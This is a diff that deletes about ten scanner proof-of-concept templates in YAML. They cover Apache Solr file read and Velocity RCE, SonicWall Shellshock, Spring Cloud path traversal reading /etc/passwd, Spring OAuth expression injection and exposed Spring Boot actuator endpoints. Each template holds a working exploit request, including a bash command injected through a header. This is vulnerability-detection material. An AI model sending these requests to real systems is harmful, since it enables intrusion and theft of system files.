- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186


@ -1,25 +0,0 @@
name: poc-yaml-solr-fileread2
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: "true"
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///c://windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186


@ -1,38 +0,0 @@
name: poc-yaml-solr-velocity-template-rce
set:
r1: randomInt(20000, 40000)
r2: randomInt(20000, 40000)
rules:
- method: GET
path: "/solr/admin/cores?wt=json"
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: |
"name":"(?P<core>[^"]+)"
- method: POST
path: >-
/solr/{{core}}/config
headers:
Content-Type: application/json
body: |-
{
"update-queryresponsewriter": {
"startup": "test",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
expression: response.status == 200
- method: GET
path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c"
follow_redirects: false
expression: response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: Loneyer
description: 'Apache Solr RCE via Velocity template'
links:
- https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
- https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2


@ -1,16 +0,0 @@
name: poc-yaml-sonicwall-ssl-vpn-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(1140000, 1144800)
rules:
- method: GET
path: /cgi-bin/jarrewrite.sh
follow_redirects: false
headers:
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
detail:
author: sharecast
links:
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/


@ -1,12 +0,0 @@
name: poc-yaml-spring-actuator-heapdump-file
rules:
- method: HEAD
path: /actuator/heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-actuator-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html


@ -1,15 +0,0 @@
name: poc-yaml-spring-cloud-cve-2020-5405
rules:
- method: GET
path: >-
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit."))
detail:
version: <= 2.1.6, 2.2.1
author: kingkk(https://www.kingkk.com/)
links:
- https://pivotal.io/security/cve-2020-5405
- https://github.com/spring-cloud/spring-cloud-config


@ -1,12 +0,0 @@
name: poc-yaml-spring-cloud-cve-2020-5410
rules:
- method: GET
path: >-
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9"
links:
- https://xz.aliyun.com/t/7877


@ -1,15 +0,0 @@
name: poc-yaml-spring-cve-2016-4977
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: GET
path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test
follow_redirects: false
expression: >
response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)"
author: hanxiansheng26(https://github.com/hanxiansheng26)
links:
- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977


@ -1,12 +0,0 @@
name: poc-yaml-spring-heapdump-file
rules:
- method: HEAD
path: /heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html


@ -1,9 +0,0 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit


@ -1,9 +0,0 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /actuator/env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit
